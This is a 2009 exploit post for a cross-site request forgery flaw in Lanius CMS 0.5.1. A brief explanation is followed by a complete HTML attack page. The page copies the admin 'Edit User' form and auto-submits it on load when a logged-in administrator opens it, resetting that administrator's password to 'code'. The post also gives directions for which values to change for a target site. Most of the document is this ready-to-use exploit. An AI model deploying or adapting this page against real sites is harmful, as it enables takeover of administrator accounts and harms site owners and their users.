Lanius CMS version 0.5.1 cross site request forgery exploit
Source: d14l.123[at]hotmail.com   Author: d14l   Published: 2009-02-11
[-] Lanius CMS 0.5.1 CSRF vulnerability

[-] Exploit found by d14l and marcoj

[-] Greetz to soul, stefo, sp1r1t, invisible, kisobran and others

[-] Lanius CMS 0.5.1 suffers from a cross-site request forgery vulnerability that allows an attacker to change the administrator's password. The admin "Edit User" form (admin.php?com_option=user) carries no anti-CSRF token, so a page hosted on any other site can re-submit it using the session cookie of a logged-in administrator's browser.

Only [site], [path] and the victim's [id] need to be changed in the source below, and the victim's password is set to "code". Note that what the POST actually carries is the hidden user_id field (value 244 in this captured copy); the [id] in the breadcrumb link is only a link, so set user_id to the victim's user ID as well. When an administrator who is logged in to [site] opens the page, the body onload handler calls ui_lcms_st('save'): it passes the form's own checks (display name, username and email non-empty) and hands off to lcms_st(), which is not defined on this page and comes from admin/includes/js/anthill.js, the only script loaded from [site]; that submits the form. The remaining script and stylesheet includes use relative paths and simply fail to load when the page is hosted elsewhere, which does not stop the onload handler. The exploit needs a valid admin session on [site] and JavaScript enabled; the <noscript> fallback (alt_task[]=save) would require the victim to press "Go" themselves.
//////////////////////////////////////////////////CODE///////////////////////////////////////////////////////////////////////////




<html>
<head>
<script type="text/javascript" language="javascript" src="http://[site]/[path]/admin/includes/js/anthill.js"></script>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
var lcms_data_form='adminform';
/* ]]> */
</script>
<script type="text/javascript" language="javascript" src="includes/js/progressbar.js"></script>
<script type="text/javascript" language="javascript" src="includes/js/passwordquality.js"></script>
<link href="includes/css/progressbar.css" rel="stylesheet" type="text/css" media="all" />

<script type="text/javascript" language="javascript">
/* <![CDATA[ */
function _init_pwd_box() {
		initQualityMeter("user_password", "the_password", "Password quality: ");
	}
	pb_addEvent(window, "load", _init_pwd_box);

/* ]]> */
</script>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */

	var dil_folder = 'media/forum/avatars/';
	var dil_default_src = 'media/forum/avatars/default.png';
	
	function changeImage(srcObj,srcListName) {
		var im=document.getElementById("image_"+srcListName);
		var obj_v = srcObj.value;
		if (obj_v==null || obj_v=="") im.src = dil_default_src; 
		else im.src = dil_folder+obj_v;
	}

	
/* ]]> */
</script>
<script type="text/javascript" language="javascript" src="components/forum/forum.js"></script>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
function ui_lcms_st(pressbutton){
var frm=document.getElementById(lcms_data_form);
	if ( pressbutton == 'save' ) {
		
var frm=document.getElementById('adminform');
	field_value=frm.user_name.value;
	if (!field_value.length) { alert("Invalid value for\n\nDisplay name");return false;
}
	field_value=frm.user_user.value;
	if (!field_value.length) { alert("Invalid value for\n\nUsername");return false;
}
	field_value=frm.user_email.value;
	if (!field_value.length) { alert("Invalid value for\n\nEmail");return false;
}

	}	if ( pressbutton == 'cancel' ) {
		document.location.href=frm.action; return;}

	lcms_st(pressbutton);
}

/* ]]> */
</script>
<script language="javascript" type="text/javascript">
var cmThemeDefaultBase = "admin/templates/default/images/";
</script>
<script language="javascript" src="admin/templates/default/js/JSCookMenu.js" type="text/javascript"></script>
<script language="javascript" src="index2.php?option=service&amp;service=admin_menu&amp;no_html=1&amp;lang=en" type="text/javascript"></script>
<script language="javascript" src="admin/templates/default/js/ThemeDefault/theme.js" type="text/javascript"></script>
<link rel="stylesheet" href="admin/templates/default/js/ThemeDefault/theme.css" type="text/css" /><script language="javascript" src="admin/includes/js/dhtml.js" type="text/javascript"></script>

<link rel="stylesheet" href="admin/templates/default/css/template.style.css" type="text/css" />
</head>
<body onload="ui_lcms_st('save');">

<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="320" class="top-logo" >
		<img src="admin/templates/default/images/header.png" alt="Administration" />
	</td>
    <td width="240" class="top-update" >
<a class="dlinks" title="Information about the latest version available, click to start the automatic update wizard" href="http://[site]/[path]/admin.php?com_option=system&amp;option=autoupdate"><img border="0" src="http://www.laniuscms.org/services/status.png.php?v=0.5.1+r843" alt="Information about the latest version available, click to start the automatic update wizard"  /></a>	
	</td>
    <td align="right" class="top-logo" ><a href="index.php?option=login&amp;task=logout" class="wlink" style="color: #e5e5e5"><img src="admin/templates/default/images/logout.png" border="0" alt="" />&nbsp;Logout</a>&nbsp;</td>

  </tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
              <tr class="toolmenu">
                <td height="25"><div id="myMenuID" style="margin-left: 15px;"></div>
<script language="javascript" type="text/javascript">
			cmDraw ("myMenuID", myMenu, "hbr", cmThemeDefault, "ThemeDefault");
		</script>
<noscript><big>Your browser does not have javascript support, please enable it or either ask the administrator to enable a non-javascript menu</big></noscript></td>
                <td align="right">
                    <table class="hotlinks" border="0" cellspacing="0" cellpadding="2">
                      <tr><td>&nbsp;</td>

						                      </tr>
                    </table>
                </td>
                <td align="right"></td>
              </tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0">
<tr><td class="pathway-backend"><a title="Home page" href="http://[site]/[path]/admin.php" class="pathway"><img src="media/common/home.png" border="0" alt="Home page" /></a> Edit User <a title="Permanent link to this page" href="http://[site]/[path]/admin.php?com_option=user&amp;task=edit&amp;cid[]=[id]"><img src="media/common/box.png" border="0" alt="Permanent link to this page" /></a> </td>
	</tr>

</table>
	<div class="dka_component">
<form id='adminform' name='adminform' method='post' action='http://[site]/[path]/admin.php?com_option=user'  enctype='multipart/form-data'><div class="toolbar-header"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');"  />
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)"  />
<noscript>
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>
<select name="alt_task[]">
<option value="">--</option>
<option value="save">Save</option>
<option value="cancel">Cancel</option>
</select>
<input type="submit" value="Go" /></noscript>
</div><table border='0' cellpadding='0' cellspacing='0' width='100%' align='center'>
<tr><td colspan='2' class="" ><input type="hidden" name="task" value="" /></td></tr>

<tr><td colspan='2' class="header1" >Edit User</td></tr>

<tr><td colspan="2">
<table width="100%" border="0" cellpadding="5" cellspacing="2" >
          <tr><td class="tabtitle">Edit User&nbsp;</td></tr><tr>

          <td class="tabbody">
                  <table width="90%" border="0" align="center" cellpadding="2" cellspacing="0">
                   <tr><td width="200">&nbsp;</td><td>&nbsp;</td></tr>
<tr><td colspan='2' class="" ><input type="hidden" name="user_id" value="244" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Display name</td><td class="" ><input type="text" name="user_name" value="Webaaaaamaster" class="tf"  size="40" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Username</td><td class="" ><input type="text" name="user_user" value="admin" class="tf"  size="40" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Email</td><td class="" ><input type="text" name="user_email" value="webmaster@example.com" class="tf"  size="40" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Language</td><td class="" ><select name="user_lang" class="tf">
<option value="" selected="selected" style="color: grey">-- Auto --</option>
<option value="en">English</option>
</select>
</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> User timezone</td><td class="" ><select name="user_tz" class="tf">

<option value="">-- Auto --</option>
<option value="Africa/Abidjan">Africa/Abidjan</option>

</select>
</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Users Group</td><td class="" ><select name="user_gid" class="tf">
<option value="1">Registered</option>
<option value="2">Editor</option>
<option value="3">Publisher</option>
<option value="4">Manager</option>
<option value="5" selected="selected" style="color: grey">Administrator</option>

</select>
</td></tr>

<tr><td colspan='2' class="" >&nbsp;</td></tr>

<tr><td colspan='2' class="" > Leave the password field empty to preserve the previous password</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Password</td><td class="" ><input type="password" name='user_password' value='code' class="tf" size='40'  onkeypress="updateQualityMeter(this)" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><div id="the_password"></div></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Password confirmation</td><td class="" ><input type="password" name='user_password1' value='code' class="tf" size='40'  /></td></tr>

<tr><td colspan='2' class="" >&nbsp;</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><label for="user_message_allow">
<input id="user_message_allow" name="user_message_allow" type="checkbox"  />Allow other users to send messages to me (email will not be visible to them)</label><br /><label for="user_message_show_email">
<input id="user_message_html" name="user_message_html" type="checkbox"  />Can receive HTML emails</label><br /><label for="user_message_attach">
<input id="user_message_attach" name="user_message_attach" type="checkbox"  checked="checked"/>Receive also attachments</label><br />
	<div class="dk_content"><h3>Avatar</h3><table border="0" cellspacing="0" cellpadding="0"><tr>
	<td><select name='user_avatar' class="tf" size='6' onchange='javascript:changeImage(this,"user_avatar")' >
<option value="default.png" selected='selected' >&lt; Current &gt;</option>

<option value="abstract8.png"  >abstract8.png</option>


</select></td>
	<td><img src="media/forum/avatars/default.png" id="image_user_avatar" name="image_user_avatar" border="2" alt="" /></td>
</tr></table>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
var tmpi_0 = new Image();
tmpi_0.src="media/forum/avatars/default.png";

/* ]]> */
</script>
</div>
				<div class="dk_content"><input type="hidden" name="MAX_FILE_SIZE" value="614400" />
<input id="user_uploaded_avatar" name="user_uploaded_avatar" type="file" class="dk_inputbox" value="" size="45"  /></div>
				<div class="dk_content">
		<h3>Forum user statistics</h3>Posts: 1<br />Member since 09 February 2009 19:10</div>

	<p><h3>Forum user information</h3></p>
	<div class="dk_content">Location: <input class="dk_inputbox" type="text" name="user_location" size="40" maxlength="100" value="" /></div>
	<div class="dk_content">Website: <input class="dk_inputbox" type="text" name="user_url" size="40" value="" /></div>
	<table border="0">
			  <tr>
			<td valign="top">&nbsp;</td>
			<td><a href='javascript:DoPrompt("user_information", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_information", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_information", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>

			</td>
		  </tr>
		  <tr>
			<td valign="top">User provided information (max 1024 characters)</td>
			<td><textarea name="user_information" cols="30" rows="16" class="dk_inputbox" id="user_information"></textarea></td>
		  </tr>		  <tr>
			<td valign="top">&nbsp;</td>

			<td><a href='javascript:DoPrompt("user_signature", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_signature", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_signature", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>
			</td>
		  </tr>
		  <tr>
			<td valign="top">Custom signature (max 300 characters)</td>

			<td><textarea name="user_signature" cols="30" rows="3" class="dk_inputbox" id="user_signature"></textarea></td>
		  </tr>	</table></td></tr>

</table></td></tr></table>
</td></tr>
</table><br /><div class="toolbar-footer" style="text-align: left"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');"  />
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)"  />
<noscript>
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>
<select name="alt_task[]">
<option value="">--</option>
<option value="save">Save</option>
<option value="cancel">Cancel</option>
</select>
<input type="submit" value="Go" /></noscript>
</div></form></div>
	<div class="footer">
	<div title="Donate now EUR 10 for the Lanius CMS Project" align="center">

<form id="_xclick" name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank">
<input name="cmd" value="_xclick" type="hidden" />
<input name="business" value="donations@laniuscms.org" type="hidden" />
<input name="no_shipping" value="0" type="hidden" />
<input name="lc" value="EN" type="hidden" />
<input name="item_name" value="Lanius CMS Project donation from website" type="hidden" />
<input name="currency_code" value="EUR" type="hidden" />
<input name="amount" value="10.00" type="hidden" />
Support the Lanius CMS Project with a small donation:
<input src="media/common/donate.png" name="submit" alt="Lanius CMS Project donation from website" type="image" />
</form>
</div>
	</div>
</body>
</html>

////////////////////////////////////////////end of code////////////////////////////////////////////////

 